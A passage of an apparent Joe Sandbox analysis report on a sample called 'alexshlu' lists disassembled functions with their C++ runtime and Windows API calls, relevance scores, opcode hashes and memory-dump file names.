                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                        • Opcode ID: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
                                                                                                                                                                                                                                        • Instruction ID: 6c163a30c74ce44341f8ed67f7dd1718c985ce2f566941e5e5fcc144238a4853
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F01D471A251109FC705EF21E84963C7BA1FF86340B14404AE80297381CF389EA2DFD1
                                                                                                                                                                                                                                        Function 002A5D40 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 483COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                        • String ID: .$invalid string position
                                                                                                                                                                                                                                        • API String ID: 3709121408-2424062830
                                                                                                                                                                                                                                        • Opcode ID: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
                                                                                                                                                                                                                                        • Instruction ID: 217bc1f832cddcf29f5ac8f0c681c2b5a7b07d483ff5286a142165f97d240e75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE02D2706283059FC714DF24C484A6AB7E5FF8A304F14896DF8958B362EB70ED65CB82
                                                                                                                                                                                                                                        Function 002A22C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                        • Opcode ID: cb78b9407326338d9234a75ff79be164349bfb0acb1ca6233a60b7cd2e57f532
                                                                                                                                                                                                                                        • Instruction ID: d960e23b26ad10f0d85c9e61692d51e2220c2dd6d9eb20652d863e90956f5eb6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb78b9407326338d9234a75ff79be164349bfb0acb1ca6233a60b7cd2e57f532
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFC16A35624202CFC714CF28C490B6AB7E1FF8A714F55866CE9598B3A1DB35EC55CB81
                                                                                                                                                                                                                                        Function 002A14C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 248COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                        • Opcode ID: 4e6018e3359f29574fa5844b9358a9930c58a898cabc7df249066f0d72b565ac
                                                                                                                                                                                                                                        • Instruction ID: 0eceb4cc3ecada8fe636a6e50337c9207a65e9b67d9d53cc1b7245b31d9d2884
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e6018e3359f29574fa5844b9358a9930c58a898cabc7df249066f0d72b565ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B89191746142008FDB14CF29C494B25B7E6FF8A724F1886ACE9468F3A6DB35EC65CB41
                                                                                                                                                                                                                                        Function 002BF2D6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(00000000,?,002BCF02), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000,?,?,00000028,002B6E76), ref: 002BABC9
                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 002BF395
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?), ref: 002BF3CC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                        • String ID: l#-$utf8
                                                                                                                                                                                                                                        • API String ID: 943130320-2281452077
                                                                                                                                                                                                                                        • Opcode ID: c7547229a6016b126de42eadfccd6f3eaa6aacb1373888d48b99f1ef3a53cf11
                                                                                                                                                                                                                                        • Instruction ID: 5b113448dbf579c083801ce3e1dfd1a7fb70362d3396743d8c25e54c40040045
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7547229a6016b126de42eadfccd6f3eaa6aacb1373888d48b99f1ef3a53cf11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E936620306AAD765AF70CE42FE773B8EF04780F14457AFA4997581E7B0E9608B61
                                                                                                                                                                                                                                        Function 002ACBC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ACBF2
                                                                                                                                                                                                                                          • Part of subcall function 002ACC88: std::_Throw_Cpp_error.LIBCPMT ref: 002ACCA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                                                                                                                                                                        • String ID: @z-$Xi-$ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 350343453-4006027970
                                                                                                                                                                                                                                        • Opcode ID: 0f5cbc6b480bfcc6ba855cac57b7872f3ba7bf73e43f3d087fe6f8566b68fd75
                                                                                                                                                                                                                                        • Instruction ID: 4bb301962f3c2eb26a1b2113a65076892fbe87dad67690876254715fe73a1b3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f5cbc6b480bfcc6ba855cac57b7872f3ba7bf73e43f3d087fe6f8566b68fd75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 721193326606069FDB15DF54C851BAAB3A5FF46724F60052EE42A97680DF75AC20CB90
                                                                                                                                                                                                                                        Function 002C5521 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C), ref: 002C552E
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C,00000000,?,002BA57C), ref: 002C5538
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 002C5560
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                        • Opcode ID: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction ID: 225d2f722c3d3789714d0911abaccba1cb1393c4d7d209de28619e36cb24b7ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE04870AD0309BBDF105F60FC0AF583BB59B10B91F640425F90CE45E0DB71EEA09645
                                                                                                                                                                                                                                        Function 002C28CA Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 002C292D
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C2B7F
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C2BC5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2C68
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                        • Opcode ID: 20186afd82c9583e4c6f8ee3c82fd519c1f1a6590c4622ca049aa5c9372b0449
                                                                                                                                                                                                                                        • Instruction ID: ba2a7e5ce04b3080fea6e5149e4bd66503874bdfcb513d47672b6a4231dc547c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20186afd82c9583e4c6f8ee3c82fd519c1f1a6590c4622ca049aa5c9372b0449
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD18975D14248DFCB15CFA8D884AEDBBB4FF08314F28466EE416EB251EA30A955CF50
                                                                                                                                                                                                                                        Function 002B9C53 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                        • Opcode ID: d9e32a30dac21af1a1b35fcffe71af3f0043e21ad890425b23ab39e230b2f6a6
                                                                                                                                                                                                                                        • Instruction ID: 68e4adbc4ec4a64e60bfecb79566390c0940057ce03b9be778ee4e6fd196a2f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9e32a30dac21af1a1b35fcffe71af3f0043e21ad890425b23ab39e230b2f6a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1510472A206079FDB25AF51D881BFAB7A4FF44780F14462EEA0647291D735ECE0CB90
                                                                                                                                                                                                                                        Function 002A2850 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A286C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A288A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A28AC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A291A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: ec120066c5ef146ec729206fd042e016c0171bb6fbc23d8da51c4d1ac696295d
                                                                                                                                                                                                                                        • Instruction ID: 1a64d3b20560e961ec3b3cdbcbf85a00a2e31763a2a67cbf7c40c96000970668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec120066c5ef146ec729206fd042e016c0171bb6fbc23d8da51c4d1ac696295d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121B471D25211DFC710EF1AE849A2A73E0FB55724F05485EE5888B361EF34AD64CF92
                                                                                                                                                                                                                                        Function 002A8290 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82AC
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82CA
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A82EC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A835A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 66e70dd0f31da7afc919691a1886438cad2be585f993376a4a33d399806ae34a
                                                                                                                                                                                                                                        • Instruction ID: 8ea3b6baf7aabab955b1ecf899d10bba734b4ab25c6ed90bbe3e0e8b5418cb74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66e70dd0f31da7afc919691a1886438cad2be585f993376a4a33d399806ae34a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D921B471D192119FCB10EF19E849A2A77E0EF56724F45499EE4888B261EF34AC60CF92
                                                                                                                                                                                                                                        Function 002A6AF0 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B0C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B2A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6B4C
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6BBA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 7478aa627f8bf452f255c072069bd01234b4a5e76fa70b058d20805963f4144c
                                                                                                                                                                                                                                        • Instruction ID: 676c9eceb58dd4e90a35a9e2298833b8da58e22b9e3a86935870e2e6eb9b4b31
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7478aa627f8bf452f255c072069bd01234b4a5e76fa70b058d20805963f4144c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB21A2719142159FC710EF15E849A5AB3E0EF55728F09485EE5849B391EF34AC60CFA2
                                                                                                                                                                                                                                        Function 002A8380 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A839C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A83BA
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A83DC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A844A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 4cee47e67a4377ae37e75e14afa950f4f29608141df601583854b78eee7df0c0
                                                                                                                                                                                                                                        • Instruction ID: 90fbd68a0b45baf38d414d9fdaba61fd8b2e8501e94a01986590161a7c5f54e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cee47e67a4377ae37e75e14afa950f4f29608141df601583854b78eee7df0c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D671D143119FD710EF15E889A2AB3E0EF59724F01885EE4445B361EF34AC64CF92
                                                                                                                                                                                                                                        Function 002A5460 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
